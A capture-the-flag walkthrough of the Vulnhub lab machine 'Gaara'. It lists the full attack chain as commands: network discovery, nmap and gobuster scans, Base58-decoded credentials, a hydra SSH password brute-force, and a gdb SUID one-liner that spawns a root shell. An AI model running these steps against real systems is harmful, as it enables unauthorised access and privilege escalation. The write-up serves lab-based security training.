Gaara Walkthrough – Vulnhub – Writeup

Gaara by 0xJin is an easy machine from Vulnhub. However, there are some rabbit holes alongside. Also, I have tested this machine on VirtualBox. “Gaara Walkthrough – Vulnhub – Writeup”.

Link to the machine: https://www.vulnhub.com/entry/gaara-1,629/

Crossroads Walkthrough – Vulnhub – Writeup

Identify the target

As usual, we have to identify the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Next, we have to scan the open ports on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.62

This is a simple machine that has HTTP and SSH services available.

Enumerate the web server

The default page had an image and nothing more.

Thus, we have to try bruteforcing the directories.

gobuster dir -u http://10.0.2.62 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir.log

There is an interesting path that we need to check.

There are three paths to check again. So, I looked at them one by one. All of them contained long texts. Hence, I decided to get unique words from them.

curl http://10.0.2.62/iamGaara | grep -oE '\w+' | sort -u -f | more

The path /iamGaara gave me an encoded text that I could decrypt using Cyber Chef. We can see that the text has lowercase and numbers (1,9), we can confirm this is not Base32. Testing for Base58 gave me credentials.

However, this didn’t work on the SSH server. But still, we have a username to bruteforce password.

hydra -l gaara -P /home/kali/rockyou.txt  10.0.2.62 ssh

Finally, I got a password. Then, I got the shell access of the user.

ssh gaara@10.0.2.62

Root privilege escalation

On the directory, there is a file Kazekage.txt that has a path. This is a rabbit hole, but let’s see.

On the directory, there is a secret file.

There is a brainf*ck encoded text that reads the following.

Next, I checked the SUID binaries on the system.

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

The binary gdb had setuid permissions. Hence, we can do privilege escalation from here.

Reference: https://gtfobins.github.io/gtfobins/gdb/#suid

gdb -nx -ex 'python import os; os.execl("/bin/bash", "bash", "-p")' -ex quit

Finally, we got the bash shell with root access. Next, we have the root flag.

Leave a comment